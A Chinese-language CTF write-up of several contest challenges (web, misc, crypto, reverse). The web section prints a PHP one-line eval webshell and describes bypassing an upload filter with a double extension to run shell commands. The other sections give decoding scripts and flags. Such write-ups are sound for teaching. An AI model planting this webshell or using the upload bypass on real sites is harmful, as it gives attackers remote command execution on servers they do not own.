安恒十一月月赛writeup

昨天做了一下十一月的题目，不才只做出来几道

签到web1

这个是十月的原题，因为忘了截图所以只能提供思路

Web消息头包含了登陆框的密码

输入密码后进入上传页面，上传一句话木马1.jpg，

<?php @eval($_POST['cmd']);?>

使用burp将上传文件名改为1.php.jpg

然后post数据发现已经getshell

Flag就在上一层目录里所以post数据:system(‘dir ../’);

得出flag为：flag{698539765730b69026796420b9201e03}

具体可以参考：https://www.jianshu.com/p/e1af7cc3483d

MISC1-Numeric password

题目：

解题过程：

起初并不知道这是啥，然后百度了一下下面的名词，发现

有点意思，然后进去看看，发现了对应关系，

然后一个一个找出来，其中21世纪就是21，是在其他数字记忆表找到的，72-企鹅……

72 78 67 73 93 67 25 20 69 20 20 70 69 68 67 70 24 21 27 67 27 20 25 27 21 72 26 20 18 20 70 70 67 70 72 23 20 95

然后试着去换成ASCII码看看，发现

出现了不可显的ASCII码，那flag肯定不是这个，既然数字已经给定了，编码最有可能是凯撒移位

Payload：

写个脚本爆破一下

exp =[72,78,67,73,93,67,25,20,69,20,20,70,69,68,67,70,24,21,27,67,27,20,25,27,21,72,26,20,18,20,70,70,67,70,72,23,20,95]
flag=""
 
for i in range(1,127):
    for j in exp:
        flag+=chr(j+i)
    print(flag)
    flag=""

flag为：flag{a72c22dcbad639a92793f8202ddadf52}

MISC2-我的公子在何方

题目：

解题过程：

压缩包是加密的，打开password，直接输入提示错误。

Base64解一下

读一下txt内容

他有提示说：其载体图像是24位的BMP格式图像

百度一下：载体图像是24位的BMP格式图像隐写工具

下载这个工具

尝试打开图片发现需要密码

然后txt提示：并且密码是与图片主人公演绎的剧中相关的人物

百度搜图

天仙配…其实我根本不知道相关人物是谁，然后百度一下演员表一个一个试吧

发现dongyong就是密码，

到网站http://tool.oschina.net/encrypt解密，一时看不出这是什么加密，那就一个一个试，

什么也没，那应该还是加密了…

密码也不知道是什么，看了题解才知道是dongyong…

Payload：

所以flag为flag{97db6057a9a113c3e0a2bfb188a92698}

CRYPTO2-仿射

题目：

解题过程：

题目已经很明了了，是仿射密码，所以到网站http://ctf.ssleye.com/affine.html

解一下，已经提示了b=7那这就好办了，直接爆破a就行

网站也提示了a的取值

在a=9的时候出现了flag

题目要求提交md5所以

Payload：

flag为：flag{e8cb7b46bcf72d62e74100dd19bc63c6}

REVERSE2-Generate

题目：

题目要求输入一个数字然后给出flag

解题过程：

到ida看一下程序的逻辑

程序刚开始有一个Getinput，跟进看一下

提示输入信息，输入到DstBuf，输入的数是16字节然后转换为整数，然后传到int型中

无符号整数v11进入循环，循环32次

V8初始值为0，然后与v11异或，再和异或

疑惑的条件即是判断v7的范围是否在@以上Z以下，且不等于”_”,”{“,” }” ,如果不满足条件提示错误退出，意思就是结果是有范围的，结果在A-Z 和{ } _

接下来的操作是

最后的结果会赋给byte_408040

并且v8会和bayt_404024再次异或，byte_404020为字节

 最后每次循环结束都把v11向后移一字节，然后继续进入循环

然后循环完毕后用start函数检测一下结果的开头

Start为

Exp

使用Z3约束解决

X=3658134498

Flag为flag: FLAG{___ZZLOZEZ_Z__AAPHTZIZ____}